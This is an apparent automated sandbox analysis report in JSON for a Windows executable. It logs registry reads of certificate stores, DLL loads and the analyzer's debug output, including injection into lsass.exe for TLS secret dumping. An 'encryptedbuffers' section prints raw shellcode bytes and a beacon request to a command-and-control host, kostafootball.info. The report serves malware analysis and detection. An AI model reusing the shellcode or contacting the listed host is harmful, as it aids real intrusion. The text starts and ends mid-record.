\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb3\\x03\\x00\\x000\\x82\\x03\\xaf0\\x82\\x02\\x97\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x08;\\xe0V\\x90BF\\xb1\\xa1uj\\xc9Y\\x91\\xc7J0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x00" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 476, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 477, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Zm\\x07\\xb67\\x1d\\x96j/\\xb6\\xba\\x92\\x82\\x8c\\xe5Q" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 478, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 479, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob", + "content": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x14\\xc3\\xbd5I\\xee\"Z\\xec\\xe174\\xad\\x8c\\xa0\\xb8\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdf<$\\xf9\\xbf\\xd6fv\\x1b&\\x80s\\xfe\\x06\\xd1\\xcc\\x8dO\\x82\\xa4~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x80\\xc8+h\\x86\\xd7\\x01\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\xc3\\x0b\\xc9tiU`\\xa2\\xf0\t\neEUl\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00N\"T \\x18\\x95\\xe6\\xe3n\\xe6\\x0f\\xfa\\xfa\\xb9\\x12\\xed\\x06\\x17\\x8f9b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xcb<\\xcb\\xb7`1\\xe5\\xe0\\x13\\x8f\\x8d\\xd3\\x9a#\\xf9\\xdeG\\xff\\xc3^C\\xc1\\x14L\\xea'\\xd4jZ\\xb1\\xcb_\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x002\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00KN\\xb4\\xb0t)\\x8b\\x82\\x8b\\\\x000\\x95\\xa1\\x0bE#\\xfb\\x95\\x1c\\x0c\\x884\\x8b\t\\xc5>[\\xab\\xa4\\x08\\xa3\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe4\\xa6\\x8a\\xc8T\\xacRBF\n\\xfdrH\\x1b*D \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x92\\x03\\x00\\x000\\x82\\x03\\x8e" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 480, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertLastSyncTime", + "content": "\\xec\\xdbPA\\xa1\\x8f\\xdb\\x01" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 481, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertLastSyncTime", + "content": "\\xd0\\xae\\x0bA\\xa1\\x8f\\xdb\\x01" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 482, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime", + "content": "\\xae\\xcb\\xeaM\\xa1\\x8f\\xdb\\x01" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 483, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 484, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime", + "content": "\\xae\\xcb\\xeaM\\xa1\\x8f\\xdb\\x01" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 485, + "data": { + "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 486, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 487, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl", + "content": "0\\x83\\x02\\xdf\\xe5\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x07\\x02\\xa0\\x83\\x02\\xdf\\xd50\\x83\\x02\\xdf\\xd0\\x02\\x01\\x011\\x0f0\r\\x06\t`\\x86H\\x01e\\x03\\x04\\x02\\x01\\x05\\x000\\x83\\x02\\xd0/\\x06\t+\\x06\\x01\\x04\\x01\\x827\n\\x01\\xa0\\x83\\x02\\xd0\\x1f0\\x83\\x02\\xd0\\x1a0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\t\\x02\t\\x14\\x01\\xdbq\\x1e\\x130p\\xaf\\x17\r250128004632Z0\t\\x06\\x05+\\x0e\\x03\\x02\\x1a\\x05\\x000\\x83\\x02\\xbe\\xa70\\x82\\x01D\\x04\\x14\\xcd\\xd4\\xee\\xae`\\x00\\xac\\x7f@\\xc3\\x80,\\x17\\x1e0\\x14\\x800\\xc0r1\\x82\\x01*0\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bh1\n\\x04\\x08\\x00\\x80\\xc8+h\\x86\\xd7\\x010\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b~1\n\\x04\\x08\\x00\\x00\\xd9\\xb5D\\xc1\\xd2\\x010\\x1e\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bi1\\x10\\x04\\x0e0\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x020 \\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x1d1\\x12\\x04\\x10\\xf0\\xc4\\x02\\xf0@N\\xa9\\xad\\xbf%\\xa0=\\xdf,\\xa6\\xfa0$\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x141\\x16\\x04\\x14\\x0e\\xac\\x82`@V'\\x97\\xe5%\\x13\\xfc*\\xe1\nS\\x95Y\\xe4\\xa400\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bb1\"\\x04 \\x88]\\xe6L4\\x0e>\\xa7\\x06X\\xf0\\x1e\\x11E\\xf9W\\xfc\\xda'\\xaa\\xbe\\xea\\x1a\\xb9\\xfa\\xa9\\xfd\\xb0\\x10-@w0Z\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0b\\x0b1L\\x04JM\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00\\x00\\x000\\x82\\x01,\\x04\\x14\\x18\\xf7\\xc1\\xfc\\xc3\t\\x02\\x03\\xfd[\\xaa/\\x86\\x1auIv\\xc8\\xdd%1\\x82\\x01\\x120\\x18\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x0bh1\n\\x04\\x08\\x00\\x006\\x04M\\xdf\\xd3\\x01" + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 488, + "data": { + "file": "kernel32.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 489, + "data": { + "file": "kernelbase.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 490, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 491, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 492, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 493, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 494, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 495, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 496, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 497, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,203", + "eid": 498, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,281", + "eid": 499, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,281", + "eid": 500, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:30,281", + "eid": 501, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:30,281", + "eid": 502, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableUmpdBufferSizeCheck", + "content": null + } + }, + { + "event": "load", + "object": "library", + "timestamp": "2025-03-07 21:41:30,281", + "eid": 503, + "data": { + "file": "ntdll.dll", + "pathtofile": null, + "moduleaddress": null + } + } + ], + "encryptedbuffers": [ + { + "process_name": "0b15348fb954e0b4331e.exe", + "pid": 9448, + "api_call": "CryptEncrypt", + "buffer": "\\xe8\\x00\\x00\\x00\\x00X\\x89\\xc3\\x05:\\x05\\x00\\x00\\x81\\xc3:\\x1f\\x00\\x00h\\x01\\x00\\x00\\x00h\\x05\\x00\\x00\\x00ShEwb0P\\xe8\\x04\\x00\\x00\\x00\\x83\\xc4\\x14\\xc3\\x83\\xecH\\x83d$\\x18\\x00\\xb9Lw&\\x07SUVW3\\xf6\\xe8\"\\x04\\x00\\x00\\xb9I\\xf7\\x02x\\x89D$\\x1c\\xe8\\x14\\x04\\x00\\x00\\xb9X\\xa4S\\xe5\\x89D$ \\xe8\\x06\\x04\\x00\\x00\\xb9\\x10\\xe1\\x8a\\xc3\\x8b\\xe8\\xe8\\xfa\\x03\\x00\\x00\\xb9\\xaf\\xb1\\\\x94\\x89D$,\\xe8\\xec\\x03\\x00\\x00\\xb93\\x00\\x9e\\x95\\x89D$0\\xe8\\xde\\x03\\x00\\x00\\x8b\\xd8\\x8bD$\\\\x8bx<\\x03\\xf8\\x89|$\\x10\\x81?PE\\x00\\x00t\\x073\\xc0\\xe9\\xb8\\x03\\x00\\x00\\xb8L\\x01\\x00\\x00f9G\\x04u\\xee\\xf6G8\\x01u\\xe8\\x0f\\xb7W\\x06\\x0f\\xb7G\\x14\\x85\\xd2t\"\\x8dO$\\x03\\xc8\\x83y\\x04\\x00\\x8b\\x01u\\x05\\x03G8\\xeb\\x03\\x03A\\x04;\\xc6\\x0fG\\xf0\\x83\\xc1(\\x83\\xea\\x01u\\xe3\\x8dD$4P\\xff\\xd3\\x8bD$8\\x8b_P\\x8dP\\xff\\x8dH\\xff\\xf7\\xd2H\\x03\\xce\\x03", + "crypt_key": "0x004b3d88" + }, + { + "process_name": "0b15348fb954e0b4331e.exe", + "pid": 9448, + "api_call": "SslEncryptPacket", + "buffer": "GET /photo.png?id=0108B4F53D30923DC90000000000FF40000005 HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: kostafootball.info", + "buffer_size": "119" + } + ] + }, + "debug": { + "log": "2025-02-13 13:27:44,098 [root] INFO: Date set to: 20250307T21:41:08, timeout set to: 180\n2025-03-07 21:41:08,932 [root] DEBUG: Starting analyzer from: C:\\tmp7wr5rocj\n2025-03-07 21:41:08,932 [root] DEBUG: Storing results at: C:\\JqmhgbJoxD\n2025-03-07 21:41:08,932 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\OwKoHu\n2025-03-07 21:41:08,932 [root] DEBUG: Python path: C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32\n2025-03-07 21:41:08,932 [root] INFO: analysis running as an admin\n2025-03-07 21:41:08,932 [root] INFO: analysis package specified: \"exe\"\n2025-03-07 21:41:08,932 [root] DEBUG: importing analysis package module: \"modules.packages.exe\"...\n2025-03-07 21:41:08,932 [root] DEBUG: imported analysis package \"exe\"\n2025-03-07 21:41:08,932 [root] DEBUG: initializing analysis package \"exe\"...\n2025-03-07 21:41:08,932 [lib.common.common] INFO: wrapping\n2025-03-07 21:41:08,932 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-03-07 21:41:08,932 [root] DEBUG: New location of moved file: C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe\n2025-03-07 21:41:08,932 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option\n2025-03-07 21:41:08,932 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option\n2025-03-07 21:41:08,932 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option\n2025-03-07 21:41:08,932 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option\n2025-03-07 21:41:08,979 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-03-07 21:41:08,979 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-03-07 21:41:08,979 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-03-07 21:41:08,994 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.human\"\n2025-03-07 21:41:09,010 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-03-07 21:41:09,010 [lib.api.screenshot] ERROR: No module named 'PIL'\n2025-03-07 21:41:09,010 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-03-07 21:41:09,010 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-03-07 21:41:09,010 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-03-07 21:41:09,010 [root] DEBUG: attempting to configure 'Browser' from data\n2025-03-07 21:41:09,041 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-03-07 21:41:09,041 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-03-07 21:41:09,104 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-03-07 21:41:09,104 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-03-07 21:41:09,104 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-03-07 21:41:09,104 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-03-07 21:41:09,104 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-03-07 21:41:09,104 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-03-07 21:41:09,952 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-03-07 21:41:09,952 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-03-07 21:41:09,954 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-03-07 21:41:09,954 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-03-07 21:41:09,954 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-03-07 21:41:09,954 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-03-07 21:41:09,954 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-03-07 21:41:09,954 [modules.auxiliary.disguise] INFO: Disguising GUID to c4c17747-db19-4d17-a23d-bc049df03cf3\n2025-03-07 21:41:09,954 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-03-07 21:41:09,954 [root] DEBUG: Initialized auxiliary module \"Human\"\n2025-03-07 21:41:09,954 [root] DEBUG: attempting to configure 'Human' from data\n2025-03-07 21:41:09,954 [root] DEBUG: module Human does not support data configuration, ignoring\n2025-03-07 21:41:09,954 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.human\"...\n2025-03-07 21:41:09,954 [root] DEBUG: Started auxiliary module modules.auxiliary.human\n2025-03-07 21:41:09,954 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-03-07 21:41:09,954 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-03-07 21:41:09,954 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-03-07 21:41:09,954 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-03-07 21:41:09,954 [modules.auxiliary.screenshots] WARNING: Python Image Library is not installed, screenshots are disabled\n2025-03-07 21:41:09,954 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-03-07 21:41:09,954 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-03-07 21:41:09,954 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-03-07 21:41:09,959 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-03-07 21:41:09,959 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-03-07 21:41:09,960 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 660\n2025-03-07 21:41:10,432 [lib.api.process] INFO: Monitor config for : C:\\tmp7wr5rocj\\dll\\660.ini\n2025-03-07 21:41:10,432 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-03-07 21:41:10,432 [lib.api.process] INFO: 64-bit DLL to inject is C:\\tmp7wr5rocj\\dll\\HPIzXiB.dll, loader C:\\tmp7wr5rocj\\bin\\WLksGifk.exe\n2025-03-07 21:41:10,580 [root] DEBUG: Loader: Injecting process 660 with C:\\tmp7wr5rocj\\dll\\HPIzXiB.dll.\n2025-03-07 21:41:10,593 [root] DEBUG: 660: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-03-07 21:41:10,616 [root] INFO: Disabling sleep skipping.\n2025-03-07 21:41:10,648 [root] DEBUG: 660: TLS secret dump mode enabled.\n2025-03-07 21:41:10,711 [root] DEBUG: 660: RtlInsertInvertedFunctionTable 0x00007FFA1A78090E, LdrpInvertedFunctionTableSRWLock 0x00007FFA1A8DD510\n2025-03-07 21:41:10,714 [root] DEBUG: 660: Monitor initialised: 64-bit capemon loaded in process 660 at 0x00007FF9D9EA0000, thread 5228, image base 0x00007FF786A90000, stack from 0x000000490DB73000-0x000000490DB80000\n2025-03-07 21:41:10,719 [root] DEBUG: 660: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-03-07 21:41:10,743 [root] DEBUG: 660: Hooked 5 out of 5 functions\n2025-03-07 21:41:10,745 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-03-07 21:41:10,751 [root] DEBUG: Successfully injected DLL C:\\tmp7wr5rocj\\dll\\HPIzXiB.dll.\n2025-03-07 21:41:10,756 [lib.api.process] INFO: Injected into 64-bit \n2025-03-07 21:41:10,756 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-03-07 21:41:10,970 [root] DEBUG: 660: TLS 1.2 secrets logged to: C:\\JqmhgbJoxD\\tlsdump\\tlsdump.log\n2025-03-07 21:41:16,684 [root] INFO: Restarting WMI Service\n2025-03-07 21:41:16,728 [root] DEBUG: package modules.packages.exe does not support configure, ignoring\n2025-03-07 21:41:16,728 [root] WARNING: configuration error for package modules.packages.exe: error importing data.packages.exe: No module named 'data.packages'\n2025-03-07 21:41:16,728 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-03-07 21:41:16,738 [lib.api.process] INFO: Successfully executed process from path \"C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe\" with arguments \"\" with pid 9448\n2025-03-07 21:41:16,738 [lib.api.process] INFO: Monitor config for : C:\\tmp7wr5rocj\\dll\\9448.ini\n2025-03-07 21:41:16,738 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp7wr5rocj\\dll\\edtWzQpr.dll, loader C:\\tmp7wr5rocj\\bin\\iLNKOOr.exe\n2025-03-07 21:41:16,747 [root] DEBUG: Loader: Injecting process 9448 (thread 9452) with C:\\tmp7wr5rocj\\dll\\edtWzQpr.dll.\n2025-03-07 21:41:16,749 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-03-07 21:41:16,749 [root] DEBUG: Successfully injected DLL C:\\tmp7wr5rocj\\dll\\edtWzQpr.dll.\n2025-03-07 21:41:16,749 [lib.api.process] INFO: Injected into 32-bit \n2025-03-07 21:41:18,758 [lib.api.process] INFO: Successfully resumed \n2025-03-07 21:41:18,859 [root] DEBUG: 9448: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-03-07 21:41:18,859 [root] INFO: Disabling sleep skipping.\n2025-03-07 21:41:18,859 [root] DEBUG: 9448: Dropped file limit defaulting to 100.\n2025-03-07 21:41:18,874 [root] DEBUG: 9448: YaraInit: Compiled 41 rule files\n2025-03-07 21:41:18,890 [root] DEBUG: 9448: YaraInit: Compiled rules saved to file C:\\tmp7wr5rocj\\data\\yara\\capemon.yac\n2025-03-07 21:41:18,890 [root] DEBUG: 9448: YaraScan: Scanning 0x00400000, size 0x81e17\n2025-03-07 21:41:18,890 [root] DEBUG: 9448: AmsiDumper initialised.\n2025-03-07 21:41:18,890 [root] DEBUG: 9448: Monitor initialised: 32-bit capemon loaded in process 9448 at 0x73040000, thread 9452, image base 0x400000, stack from 0x193000-0x1a0000\n2025-03-07 21:41:18,890 [root] DEBUG: 9448: Commandline: \"C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe\"\n2025-03-07 21:41:18,922 [root] DEBUG: 9448: hook_api: LdrpCallInitRoutine export address 0x77062A30 obtained via GetFunctionAddress\n2025-03-07 